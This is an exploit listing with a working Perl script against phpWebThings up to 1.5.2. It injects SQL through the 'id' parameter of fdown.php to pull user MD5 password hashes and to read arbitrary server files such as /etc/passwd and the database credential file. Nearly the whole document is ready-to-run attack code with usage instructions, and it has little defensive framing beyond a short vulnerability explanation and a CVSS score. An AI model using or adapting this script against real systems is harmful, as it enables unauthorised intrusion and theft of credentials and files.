phpWebThings <= 1.5.2 MD5 Hash Retrieve/File Disclosure Exploit

Credit: staker
Risk: High
Local: No
Remote: Yes

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl ################################################################################################### # phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Remote Exploit # # # # by staker # # ------------------------------ # # mail: staker[at]hotmail[dot]it # # url: # # ------------------------------ # # # # NOTE: # # 1. it works regardless of php.ini settings # # 2. wt_config.php contains mysql login # # # # short explanation: # # ---------------------------------------------------- # # phpWebThings contains a flaw that allows an attacker # # to carry out an SQL injection attack. The issue is # # due to the fdown.php script not properly sanitizing # # user-supplied input to the 'id' variable. This may # # allow an attacker to inject or manipulate # # SQL queries in the backend database (php.ini indep) # # ---------------------------------------------------- # # # # [file: fdown.php] # # ------------------------------------ # # # # <?php # # include_once("core/main.php"); # # # # $ret = db_query("select file from {$config["prefix"]}_forum_msgs where cod={$_REQUEST["id"]}"); # # $row = db_fetch_array($ret); # # header('HTTP/1.1 200 OK'); # # header('Date: ' . date("D M j G:i:s T Y")); # # header('Last-Modified: ' . date("D M j G:i:s T Y")); # # header("Content-Type: application/force-download"); # # header("Content-Lenght: " . (string)(filesize("var/forumfiles/{$row["file"]}"))); # # header("Content-Transfer-Encoding: Binary"); # # header("Content-Disposition: attachment; filename={$row["file"]}"); # # readfile("var/forumfiles/{$row["file"]}"); # # # # ?> # # # # ------------------------------------- # # # # yeat@snippet:~/Desktop$ perl localhost/cms -c 1 # # [*--------------------------------------------------------------------*] # # [* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit *] # # [*--------------------------------------------------------------------*] # # [* Usage: perl [target + path] [OPTIONS] *] # # [* *] # # [* Options: *] # # [* [files] -d ../../../../../../etc/passwd *] # # [* [hash.] -c user_id *] # # [* [table] -t set a table prefix (default: wt) *] # # [*--------------------------------------------------------------------*] # # [* MD5 Hash: f2c79ad3d1f03ba266dc0a85e1266671 # # # # ---------------------------------------------------------- # # Today is: 12 June 2009 # # Location: Italy,Turin. # # # # ---------------------------------------------------------- # ################################################################################################### use LWP::UserAgent; use Getopt::Long; &phpWebThings::init; my ($files,$admin,$ua_lib,$domain,$table); $domain = $ARGV[0] || exit(0); $ua_lib = LWP::UserAgent->new( timeout => 5, max_redirect => 0, agent => 'Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)', ) || die $!; GetOptions( 'p=s' => \$proxy, 'd=s' => \$files, 'c=i' => \$admin, 't=s' => \$table, ); die(&phpWebThings::Exploit); sub phpWebThings::Exploit() { return Disclose::File($files) if defined $files; return Retrieve::Hash($admin) if defined $admin; } sub Disclose::File { my $filename = $_[0] || die $!; my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70"; my $response = $ua_lib->post(parse::URL($domain.$keywords), [ id => "1/**/union/**/select/**/0x".Hex::convert($filename)."#" ]); if ($response->status_line =~ /^(302|200|301)/) { return $response->content; } else { return $response->as_string; } } sub Retrieve::Hash() { my $user_id = $_[0] || die $!; my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70"; my $prefix = (defined $table) ? $table : 'wt'; my $response = $ua_lib->post(parse::URL($domain.$keywords), [ id => "1 UNION SELECT password FROM ${prefix}_users WHERE uid=$user_id#" ]); if ($response->status_line =~ /^(302|200|301)/) { if ($response->content =~ /([0-9a-f]{32})/) { return "[* MD5 Hash: $1\n"; } } else { return $response->as_string; } } sub Hex::convert() { my $string = shift @_ || die $!; return unpack("H*",$string); } sub parse::URL() { my $string = shift @_ || die($!); if ($string !~ /^http:\/\/?/i) { $string = 'http://'.$string; } return $string; } sub phpWebThings::init { print "[*--------------------------------------------------------------------*]\n". "[* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit *]\n". "[*--------------------------------------------------------------------*]\n". "[* Usage: perl [target + path] [OPTIONS] *]\n". "[* *]\n". "[* Options: *]\n". "[* [files] -d ../../../../../../etc/passwd *]\n". "[* [hash.] -c user_id *]\n". "[* [table] -t set a table prefix (default: wt) *]\n". "[*--------------------------------------------------------------------*]\n"; }

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